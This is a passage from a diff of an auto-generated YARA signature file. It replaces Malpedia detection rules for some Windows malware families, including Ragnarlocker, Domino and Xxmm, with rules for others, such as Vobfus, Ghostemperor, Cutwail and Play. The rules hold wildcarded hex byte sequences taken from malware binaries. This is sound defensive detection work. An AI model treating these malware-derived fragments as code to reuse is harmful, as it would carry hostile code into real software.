cocacoding dot com" - id = "e474a54c-f0e2-58cf-8fb5-f5efe389dd86" + id = "379cd9d3-d698-58d1-90c1-aa0d12f74cc4" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ragnarlocker_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vobfus_auto.yar#L1-L221" license_url = "N/A" - logic_hash = "0ce73fa8ff409c8b46cae101a5ed771c097f4c9fb16c4b873e6cf25053373d48" + logic_hash = "87942ff8c467cfeb6529bdba1fb2a14574a28472aae2c0f0acabf5e6455fc919" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -162715,32 +165480,45 @@ rule MALPEDIA_Win_Ragnarlocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 898df4feffff 894dc0 8b4f14 898decfeffff 894df8 8b4d0c 0fb601 } - $sequence_1 = { 33f1 8b4de8 8bd0 2345d4 3355d4 2355c8 33d0 } - $sequence_2 = { 0fb6c5 6a04 0bd0 0fb6c1 6800300000 c1e208 53 } - $sequence_3 = { 039d28ffffff 13bd24ffffff 035d94 137d98 81c338b548f3 81d75bc25639 015df4 } - $sequence_4 = { 0fa4ca17 c1ee09 c1e117 0bda 8b55dc 0bf1 8b4de0 } - $sequence_5 = { 8bfa 8b4dd4 8bf1 337de8 3375f4 237dac 2355e8 } - $sequence_6 = { 897dfc 8bbd34ffffff 8bf7 8bcf c1e618 0facd108 } - $sequence_7 = { 3375ec 8b55e8 2355c0 2375d4 33fa 8b4df4 234dec } - $sequence_8 = { 03c3 8945b8 13cf 33ff 894de0 } - $sequence_9 = { c1e108 0bc8 0fb64604 c1e108 0bc8 894b14 0f114318 } + $sequence_0 = { 8b5508 8b92e8000000 8b82841d0000 50 50 8b10 } + $sequence_1 = { 8b5508 8b92e8000000 8b825c1e0000 50 } + $sequence_2 = { 8bec 8b5508 8b92e8000000 8b82c8150000 } + $sequence_3 = { 8b8220000000 50 50 8b10 ff5204 58 } + $sequence_4 = { 8b5508 8b92e8000000 8b8200080000 50 } + $sequence_5 = { 8b5508 8b92e8000000 8b82b4230000 50 } + $sequence_6 = { 8b5508 8b92e8000000 8b82d0130000 50 } + $sequence_7 = { 8b5508 8b92e8000000 8b829c0e0000 50 } + $sequence_8 = { f3ed ebf2 ed ec } + $sequence_9 = { ec f2ed ec f2ed ec f3ed } + $sequence_10 = { f2e8fae6d5f6 d2b5f2bb8ff3 ae 73f3 aa 5c f6ac4ff8b54ffb } + $sequence_11 = { 801800 0808 0006 3401 41 06 } + $sequence_12 = { 7cc8 dc7acd e291 d2e8 } + $sequence_13 = { 8631 96 0a7f25 7a43 92 9afc9e5780451f } + $sequence_14 = { 0c38 a95bedb2e5 759e 3a9b423ceb9d 65be2dafffcd 3624e4 6bee88 } + $sequence_15 = { 4b ce 8ca4b11e13b793 73aa fa } + $sequence_16 = { 48 0008 78ff 0d50004900 3e3cff 46 } + $sequence_17 = { 5c f6ac4ff8b54ffb c058fcca 61 } + $sequence_18 = { 46 14ff 0470 fe0a } + $sequence_19 = { e752 47 625403a7 78f5 06 95 } + $sequence_20 = { 6c 74ff 801800 0808 } + $sequence_21 = { b909dfd18c 9d 7454 2bcd 8ab411746337ed 80ab931e2e5e88 } + $sequence_22 = { c8ed9459 ef 60 226aa3 60 8907 6bdd97 } condition: - 7 of them and filesize <147456 + 7 of them and filesize <409600 } -rule MALPEDIA_Win_Domino_Auto : FILE +rule MALPEDIA_Win_Varenyky_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "eddf3fd4-b67b-5548-8ce8-44ad7e57875e" + id = "799963a3-0366-58c7-b923-0a51c9db342a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.domino_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.varenyky_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "bd7ff729d0491d94e0d98300cebe034f3949530bba7c0c3abfe7de162ca0ef3c" + logic_hash = "9e07244b9e5d336f26b69f46ff4024108fa6443c2648edcc9fb5aa11d967154b" score = 75 quality = 75 tags = "FILE" @@ -162754,32 +165532,32 @@ rule MALPEDIA_Win_Domino_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b940000000 488bd8 ff15???????? 4c63c3 } - $sequence_1 = { 8bc6 4881c470010000 415f 415e 415d 415c } - $sequence_2 = { 41b800300000 488bd6 33c9 4c8bf6 ff15???????? } - $sequence_3 = { 498bd0 492bc8 4963c1 4c8d1d622e0000 428a0418 320411 } - $sequence_4 = { 7d07 ffc8 83c8f0 ffc0 48ffc2 } - $sequence_5 = { 4889742410 57 4883ec20 4863fa 488bf1 4885c9 750e } - $sequence_6 = { 488b1a 488bfa 488bf1 8b13 488bce e8???????? } - $sequence_7 = { 895c2420 66899c24b0000000 ff15???????? 85c0 741a 488b4c2458 } - $sequence_8 = { 7f20 488b0b 4885c9 7406 ff15???????? 48832300 83c8ff } - $sequence_9 = { e8???????? 4533c9 448bc7 488bd6 488bcb e8???????? 488b5c2438 } + $sequence_0 = { 8b3d???????? 8b542418 6a00 52 8d8424c0130000 50 55 } + $sequence_1 = { 8d542435 6a00 52 c644243c00 e8???????? } + $sequence_2 = { 6880000000 8bd6 52 ff15???????? 6803010000 8d842485020000 } + $sequence_3 = { 83c40c 6a40 898424a4010000 898c249c010000 8a0d???????? 899424a0010000 8d442450 } + $sequence_4 = { 03f0 0fbe01 3bc3 75f0 } + $sequence_5 = { 57 e8???????? 83c404 3c32 } + $sequence_6 = { 8d84244d030000 53 50 c744242404010000 889c2454030000 e8???????? } + $sequence_7 = { 51 ffd6 68???????? 8d542474 52 ffd7 } + $sequence_8 = { 56 57 6803010000 8d44243d 53 50 885c2444 } + $sequence_9 = { 41 03e8 0fbe01 3bc3 75f0 0fbe842440020000 } condition: - 7 of them and filesize <50176 + 7 of them and filesize <24846336 } -rule MALPEDIA_Win_Mpkbot_Auto : FILE +rule MALPEDIA_Win_Unidentified_071_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "72738a74-041e-590e-bcbe-fef59ce6d7c8" + id = "9e4ae8e5-b01b-5dfb-9ebf-d96081ff094b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mpkbot_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_071_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "84a9c41e42e448fecfbe039fb747c3f04c473f008e3e19f5ee4ba318bc990491" + logic_hash = "cf757bc05d123f04b705025eb8059bfc6f948c6a237ae24790160c041569438f" score = 75 quality = 75 tags = "FILE" @@ -162793,32 +165571,32 @@ rule MALPEDIA_Win_Mpkbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 50 ff15???????? a3???????? 8d45fc 50 683f000f00 } - $sequence_1 = { a3???????? 8d45fc 50 683f000f00 6a00 } - $sequence_2 = { 38450c 740a eb05 38450c 7503 } - $sequence_3 = { 8d55f8 52 56 6a20 68???????? } - $sequence_4 = { 55 8bec 56 57 6a00 ff15???????? 8bf0 } - $sequence_5 = { 0fb630 8975d4 db45d4 d84dc4 } - $sequence_6 = { 8bf0 0fb7450c 50 0fb74508 50 56 } - $sequence_7 = { 7507 38450c 740a eb05 } - $sequence_8 = { ff15???????? ff7508 a3???????? ffd0 5d c3 55 } - $sequence_9 = { ff15???????? ffd6 50 ffd7 } + $sequence_0 = { e8???????? ff35???????? a3???????? a1???????? 0faf05???????? a3???????? e8???????? } + $sequence_1 = { 6a20 8901 83c8ff 5a 895104 894108 d1e8 } + $sequence_2 = { 8bd9 8b4b10 2bc1 894c2404 3bc2 0f82a7000000 8b4314 } + $sequence_3 = { 6a10 5a 0f44ca 51 50 ff15???????? } + $sequence_4 = { c3 33c0 c3 8b5108 b8ffffff0f } + $sequence_5 = { ff36 e8???????? 8b0e 8b4608 2bc1 894df8 6a18 } + $sequence_6 = { 8b4c2420 8d346d00000000 8b542428 56 ff742428 8d044a } + $sequence_7 = { c20400 55 8bec 8b450c ff7510 2b4508 c1f804 } + $sequence_8 = { 0f8290000000 8b4314 55 56 57 8d3c11 } + $sequence_9 = { 85c0 8b4314 740d 25ffffff82 0d00000002 894314 0fb64b01 } condition: - 7 of them and filesize <139264 + 7 of them and filesize <1220608 } -rule MALPEDIA_Win_Mbrlocker_Auto : FILE +rule MALPEDIA_Win_Flashflood_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6a472526-8a03-5ccc-a5eb-10b46b34c6da" + id = "2b564813-7b00-54ab-b562-7a8de5369185" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlocker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mbrlocker_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.flashflood_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "2abe677d378843746aa6479444a4219927906b009fff2766ade4f081783dbae6" + logic_hash = "3006626d1ecba778668c15e0aafe5a9ff5cdfe4debbbd864318346fc290d9ab7" score = 75 quality = 75 tags = "FILE" @@ -162832,34 +165610,34 @@ rule MALPEDIA_Win_Mbrlocker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 8b35???????? 8b3d???????? 6a10 68???????? } - $sequence_1 = { 68fe000000 68???????? ffd7 83c408 } - $sequence_2 = { 68ac000000 68???????? e8???????? 68ac000000 68???????? ffd7 83c408 } - $sequence_3 = { c705????????ba514000 c705????????00020000 68fe000000 68???????? ffd6 83c408 68ff000000 } - $sequence_4 = { 68ac000000 68???????? e8???????? e8???????? } - $sequence_5 = { 68ff000000 68ac000000 68???????? e8???????? e8???????? 68ff000000 68ac000000 } - $sequence_6 = { ac 30c8 aa 4a 75f9 61 c9 } - $sequence_7 = { 68fe000000 68???????? e8???????? 68fe000000 } - $sequence_8 = { 68fe000000 68???????? e8???????? e8???????? 68ff000000 68fe000000 } - $sequence_9 = { 31c8 e8???????? 68ac000000 68???????? } + $sequence_0 = { ff15???????? 8145f800809b07 8d45f8 50 } + $sequence_1 = { 56 e8???????? 40 8945f8 0fbe06 50 } + $sequence_2 = { c3 b8???????? c3 55 8bec 81ec88020000 } + $sequence_3 = { 8bec 81ec10060000 56 6a5c ff750c ff15???????? 8bf0 } + $sequence_4 = { 6bc90c 8b91f0914000 8955f4 8b450c 6bc00c } + $sequence_5 = { ff5164 85c0 0f85c5010000 8d55f4 8b45ec 52 } + $sequence_6 = { 33c0 eb0a 57 ff15???????? 6a01 58 5f } + $sequence_7 = { 85f6 59 0f842b020000 ff7508 8d85f0fbffff 50 e8???????? } + $sequence_8 = { 50 e8???????? 8d85c0fdffff 50 8d85c0fbffff ff7508 } + $sequence_9 = { 83c62c 6a2e 56 ff15???????? 8b3d???????? 59 } condition: - 7 of them and filesize <43008 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Xxmm_Auto : FILE +rule MALPEDIA_Win_Ghostemperor_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2f4f20e9-d761-523e-a241-a1e4f366495b" + id = "22543585-64e5-59d9-a95f-0fb017ff004e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xxmm_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ghostemperor_auto.yar#L1-L228" license_url = "N/A" - logic_hash = "0f663d162fed444e7f08fa4fe0acf57f92808d6dc37ba8437dff740dddaf561a" + logic_hash = "91e3702f968d398f5f44f42cafec6cc32480eb0e4729b0b5f30643c45ff1a402" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -162871,32 +165649,45 @@ rule MALPEDIA_Win_Xxmm_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 6a00 ff15???????? 53 57 50 8945fc e8???????? } - $sequence_1 = { 6a00 ff55ec ff7650 8bf8 } - $sequence_2 = { 8b7c0e20 8b440e24 03f9 03c1 } - $sequence_3 = { 897d10 3bdf 7673 8b4508 2bc6 } - $sequence_4 = { c3 55 8bec 51 51 8b03 8b08 } - $sequence_5 = { 0f84bc000000 397d10 0f84b3000000 3bf7 } - $sequence_6 = { 034df8 83c0f8 d1e8 8d7a08 897df4 7450 } - $sequence_7 = { 0fb74606 8945e8 85c0 7429 8b47f8 } - $sequence_8 = { 3b7114 7303 8bc6 c3 53 0fb75806 57 } - $sequence_9 = { 41 4a 75f7 8b5dfc 83c728 837de800 75d7 } + $sequence_0 = { b801000000 4883c428 5b 5d 5f 5e } + $sequence_1 = { 31d2 41b801000000 4531c9 ff15???????? } + $sequence_2 = { 41c1ea03 4183e007 4585d2 0f84b9000000 } + $sequence_3 = { 8b5b10 4885db 7431 c7471800000000 89d9 } + $sequence_4 = { e8???????? 48c7470800000000 c7471000000000 4c8d7e18 4c89f9 ff15???????? 448b4648 } + $sequence_5 = { 4885c9 740d e8???????? 48c7460800000000 } + $sequence_6 = { 4989c9 4889d0 458d5aff 41f6c203 7427 4489d1 83e103 } + $sequence_7 = { 4883c410 c3 ff25???????? ff25???????? ff25???????? ff25???????? ff25???????? } + $sequence_8 = { 4889c1 4863c6 488d0440 48c1e004 4801c8 eb02 31c0 } + $sequence_9 = { 31f6 31d2 660f1f440000 488b3cf0 49313cf1 } + $sequence_10 = { c74424504900df00 c744245436004d00 c74424586b007100 c744245cf5003400 } + $sequence_11 = { 0f8883020000 33d2 c78594000000f1008500 c78598000000a8003f00 448d630e c7859c000000f7003100 } + $sequence_12 = { 01c1 89ca c1ea1f c1f904 } + $sequence_13 = { 488d4dd0 48895dd8 895de0 4c8bea e8???????? be08020000 8bce } + $sequence_14 = { 00c2 488b8568020000 8854080c 488b85b0020000 } + $sequence_15 = { 00c1 488b8568020000 488b95b0020000 884c100c 488b85b0020000 488b85b0020000 488b85b0020000 } + $sequence_16 = { 85c0 7417 418bce 448bc7 48034e08 488bd5 e8???????? } + $sequence_17 = { 7212 4d8b5a10 4d85db 7409 48895c2448 5b } + $sequence_18 = { 01c3 69cbe8030000 81c130750000 4883ec20 } + $sequence_19 = { 01d1 89ca c1e205 89cb } + $sequence_20 = { 7449 8b5c2448 488bc7 d1eb ffcb } + $sequence_21 = { 48895c2408 57 4883ec20 488d0557540000 488bd9 488901 } + $sequence_22 = { c3 83c8ff ebf5 b801000000 ebee } condition: - 7 of them and filesize <540672 + 7 of them and filesize <1115136 } -rule MALPEDIA_Win_Diceloader_Auto : FILE +rule MALPEDIA_Win_Cutwail_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "29011295-3bc8-5840-8c7d-e823af0d9069" + id = "62e269de-1aa8-5a3f-857f-84d4e225d36e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diceloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.diceloader_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cutwail_auto.yar#L1-L165" license_url = "N/A" - logic_hash = "3c776f38a1a79f5ecd47a0499d8c206a83999319aa99b844edf38b2b9ae751b8" + logic_hash = "c6c78a26e86e94e8584b09088785fb67085bf6ba9ec9ef8f1d52fe4203a44bcb" score = 75 quality = 75 tags = "FILE" @@ -162910,32 +165701,38 @@ rule MALPEDIA_Win_Diceloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7419 e8???????? 8bf0 83f8fe 0f840a010000 83f8ff } - $sequence_1 = { 75cf 488325????????00 488d0d3a220000 448905???????? c705????????01000000 ff15???????? 488325????????00 } - $sequence_2 = { 75e5 448d4301 41b9983a0000 488d1daa2a0000 8bcf 488bd3 ff15???????? } - $sequence_3 = { 8b0491 4903c5 498907 33c9 eb2a } - $sequence_4 = { 498b7318 498be3 5f c3 4053 4883ec20 33db } - $sequence_5 = { 7453 33d2 458d460e 488d4c2420 e8???????? 0fb7ce } - $sequence_6 = { 8bf0 83f8fe 0f840a010000 83f8ff 0f8406010000 4533ff 3bf3 } - $sequence_7 = { 4c8d4820 ba05000000 44894024 448bc1 c740e808000000 8d4afe e8???????? } - $sequence_8 = { e8???????? 498bd5 488d0dea1f0000 e8???????? } - $sequence_9 = { 8d4860 e8???????? 488bcd 488bf8 895808 } + $sequence_0 = { 8808 ebc1 8b5508 03550c c60200 c745fc01000000 8b45fc } + $sequence_1 = { 3930 0f8491010000 8b08 8b09 894d40 } + $sequence_2 = { eb12 8d45f4 50 8b4704 } + $sequence_3 = { 59 e9???????? 8b7de0 8b45f8 83f808 } + $sequence_4 = { 8b8568feffff 0560ea0000 39855cfeffff 7633 8b8d5cfeffff 898d68feffff e8???????? } + $sequence_5 = { 8b400c 894564 8d4568 50 } + $sequence_6 = { c7410400000000 6830750000 ff15???????? 8b55fc 8b02 50 } + $sequence_7 = { 837d1000 7d04 32c0 eb7d } + $sequence_8 = { 84c0 745e 46 8a06 } + $sequence_9 = { 51 e8???????? 83c40c c785e0fdffff00000000 c785dcfdffff00000000 } + $sequence_10 = { 3bdf 894510 0f84ecfdffff 53 50 } + $sequence_11 = { 68a6000000 89450c e8???????? 03c3 50 } + $sequence_12 = { e8???????? 83c410 8985ecfdffff 83bdecfdffffff 0f84ae000000 8b95e4fdffff } + $sequence_13 = { 76ce 8b7d6c 83ff1d 740e } + $sequence_14 = { 7509 c68563feffff01 eb77 83bd6cfeffff05 7d6e ff15???????? 89855cfeffff } + $sequence_15 = { e8???????? 83c414 8b85dcfdffff 2b85d8fdffff 0345fc } condition: - 7 of them and filesize <41984 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Taintedscribe_Auto : FILE +rule MALPEDIA_Win_Jupiter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62c390fd-70d7-5d2c-ab35-2685bb241f72" + id = "36445056-0ae8-5be8-adc6-1a78abf2ec58" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.taintedscribe_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupiter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jupiter_auto.yar#L1-L112" license_url = "N/A" - logic_hash = "9db61e016991abab1a5db24c238ca36eb7d715a36997cda629b6ade68b20e5c3" + logic_hash = "f1911af4b4fd9bd3e29d91af55822bde97c05f4b517de64421dfe8b0d1264d94" score = 75 quality = 75 tags = "FILE" @@ -162949,32 +165746,32 @@ rule MALPEDIA_Win_Taintedscribe_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc8 8b858cf7ffff 83e103 6a02 f3a4 6a00 } - $sequence_1 = { 8d4ddc 898db8fcffff 8bcf 0facd108 } - $sequence_2 = { 8b5358 898d88fbffff 8b4b50 0f94c0 } - $sequence_3 = { 85c0 7405 8b4d98 8908 85db } - $sequence_4 = { 894e3c 894e44 895648 33c0 5e 8b4dfc 33cd } - $sequence_5 = { 8b4dcc 894308 8b45d0 50 } - $sequence_6 = { 42 83fa1c 7cbb 81ff00010000 0f94c1 0fb6c1 68???????? } - $sequence_7 = { c68577fbffff01 7507 c68577fbffff00 c78570fbffff08000000 } - $sequence_8 = { 83c40c 098658af0100 8d0419 89865caf0100 83f810 } - $sequence_9 = { bb01000000 d3e3 33c0 85db 7e1e 8d4900 } + $sequence_0 = { 8a4147 884104 8a4146 884105 8b4144 c1f808 884106 } + $sequence_1 = { c605????????01 66c705????????0101 c605????????01 c605????????01 66c705????????0101 } + $sequence_2 = { 8b4144 c1f808 884106 8a4144 884107 } + $sequence_3 = { 884105 8b4144 c1f808 884106 8a4144 } + $sequence_4 = { 50 6802000000 ff35???????? ff35???????? } + $sequence_5 = { 66c705????????0101 c605????????01 c605????????01 c605????????01 } + $sequence_6 = { 884105 8b4144 c1f808 884106 8a4144 884107 } + $sequence_7 = { c1f808 884106 8a4144 884107 } + $sequence_8 = { c605????????01 66c705????????0101 c605????????01 c605????????01 } + $sequence_9 = { 884104 8a4146 884105 8b4144 } condition: - 7 of them and filesize <524288 + 7 of them and filesize <224112 } -rule MALPEDIA_Win_Wipbot_Auto : FILE +rule MALPEDIA_Win_Cotx_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2dc6790b-0815-56da-b4e1-b1ab1c837c71" + id = "4cbfd2a1-cbfc-5404-9f22-8e027db9306c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wipbot_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.cotx_auto.yar#L1-L111" license_url = "N/A" - logic_hash = "b4a431b5982e86b4c79c71104a1485b7ef9ede4d9bcd19d6e305251f54be5168" + logic_hash = "5f62f869de8e5b67f4dbb19d8460c8365da1f60d9f53861111556d3c0f9ba6d4" score = 75 quality = 75 tags = "FILE" @@ -162988,32 +165785,32 @@ rule MALPEDIA_Win_Wipbot_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { eb05 b8???????? e8???????? 89da 83c9ff e8???????? } - $sequence_1 = { 5b 5d e9???????? 5a 31c0 5b 5d } - $sequence_2 = { 4c 8d442428 baff010f00 48 89d9 ffd0 48 } - $sequence_3 = { b911000000 31c0 c644245e2e 31d2 f3aa c644245f0b c64424601f } - $sequence_4 = { 85c0 48 89c6 0f94c2 48 85db 0f94c0 } - $sequence_5 = { 8d44245f 88d1 48 01d0 48 ffc2 3208 } - $sequence_6 = { eb7d 48 894c2438 e8???????? 01c0 ba9ad65fb0 b98a758b1f } - $sequence_7 = { 8d55f4 89542408 8d55f0 c744240c00800000 89542404 c70424ffffffff ffd0 } - $sequence_8 = { 89cb b91d000000 c64424222e f3aa c644242379 c644242446 31c0 } - $sequence_9 = { 8944240c 8b45a8 83c020 890424 ffd2 85c0 0f9fc0 } + $sequence_0 = { c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????a1a14538 c705????????2086e659 } + $sequence_1 = { 740e 3d10b6afa6 7407 3d36ce164d } + $sequence_2 = { 6800f00000 81c600f00000 68???????? 56 e8???????? } + $sequence_3 = { 50 51 8d85bcebffff 50 56 } + $sequence_4 = { c705????????d468bcb5 c705????????a1a14538 c705????????2086e659 c705????????eec45abf } + $sequence_5 = { c705????????9cb95b4c c705????????2d494a94 c705????????8db133d4 c705????????8e220b1d } + $sequence_6 = { 6800040000 8d8598f6ffff 6a00 50 e8???????? 83c40c 8d8598feffff } + $sequence_7 = { 8d850af8ffff c78500f8ffff52617354 6a00 50 } + $sequence_8 = { f3a4 50 0f1185a8faffff e8???????? } + $sequence_9 = { 8bce a3???????? e8???????? 8b15???????? 8b4dfc } condition: - 7 of them and filesize <253952 + 7 of them and filesize <1171456 } -rule MALPEDIA_Win_Unidentified_111_Auto : FILE +rule MALPEDIA_Win_Makadocs_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "761c3c1a-627b-5adf-b1c2-f96f11c05a94" + id = "a9ee5e42-4244-5209-b209-43e241078b80" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_111_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.makadocs_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "8a86a6eb9509e0a5b4e912cde53abfcabb23f3644fc565d69ca8396c5dc5d7c9" + logic_hash = "9e569b2ca005ed56a66b13fc4754517215725a380988d948b175ea6348c2d54c" score = 75 quality = 75 tags = "FILE" @@ -163027,32 +165824,32 @@ rule MALPEDIA_Win_Unidentified_111_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 488b4c2428 0fbe09 3bc1 7512 } - $sequence_1 = { c744242002000000 e9???????? 837c243406 7511 837c243801 750a } - $sequence_2 = { 8b00 488b4c2430 488b09 0fbe0401 48634c2404 488b542428 0fbe0c0a } - $sequence_3 = { eb43 41b901000000 448b442424 488b542428 488b4c2448 e8???????? } - $sequence_4 = { eb1f c744242000000000 4533c9 4533c0 } - $sequence_5 = { 488b4c2448 ff15???????? 89442444 837c244400 7502 eb11 } - $sequence_6 = { 488d8c0c60020000 ba02000000 486bd200 4803ca 448bc0 488b542420 e8???????? } - $sequence_7 = { 66c1ca08 0fb7d2 4c8b8424a0000000 450fb74006 6641c1c808 450fb7c0 4c8b8c24a0000000 } - $sequence_8 = { e8???????? b910000000 e8???????? 4889442448 488b442448 488b4c2450 488908 } - $sequence_9 = { 4889542410 48894c2408 4883ec78 c744243000000000 c744243400000000 488b942488000000 488d4c2448 } + $sequence_0 = { 8b5d08 56 57 33f6 33ff 897dfc 3b1cfdf0524200 } + $sequence_1 = { 8bc6 89a554ffffff 8bfc e8???????? 83c010 8907 51 } + $sequence_2 = { 8b42f4 8d7001 8b42f8 b901000000 2b4afc 2bc6 0bc1 } + $sequence_3 = { 83c408 52 8b54243c 8d442438 50 8d4c2478 51 } + $sequence_4 = { 83c408 c644246834 8b00 8d4c2420 51 8bc8 e8???????? } + $sequence_5 = { 8b442410 56 e8???????? 85f6 7409 } + $sequence_6 = { c645fc41 8bc4 89a54cffffff 50 b9???????? e8???????? 8dbd54ffffff } + $sequence_7 = { ffd5 8b06 3b78f8 7f0f 8978f4 8b0e c6040f00 } + $sequence_8 = { 8b4c2410 51 ffd7 85c0 744c 8b44241c 50 } + $sequence_9 = { 3c09 0fb6c0 7605 83c037 eb03 83c030 8806 } condition: - 7 of them and filesize <148480 + 7 of them and filesize <344064 } -rule MALPEDIA_Win_Microbackdoor_Auto : FILE +rule MALPEDIA_Win_Play_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "32768709-e0c4-568e-99b5-4d92498e8c97" + id = "e5dc4ad0-4963-56ca-a5e5-83aec2390f77" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microbackdoor" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.microbackdoor_auto.yar#L1-L174" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.play" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.play_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "d87bae84a1434eb391a7ebc0d4af12aee586692c39928b7bf8d060b1c97f49c6" + logic_hash = "633aef027703dbbff9f2f212af038ee3039813400893deac0150b99c35143631" score = 75 quality = 75 tags = "FILE" @@ -163066,38 +165863,32 @@ rule MALPEDIA_Win_Microbackdoor_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb74510 50 ff750c ff15???????? } - $sequence_1 = { ffd7 eb06 ff15???????? 8bc6 eb06 } - $sequence_2 = { 488bcd 418bdc 4d8bfc e8???????? 85db 755b 488d842478020000 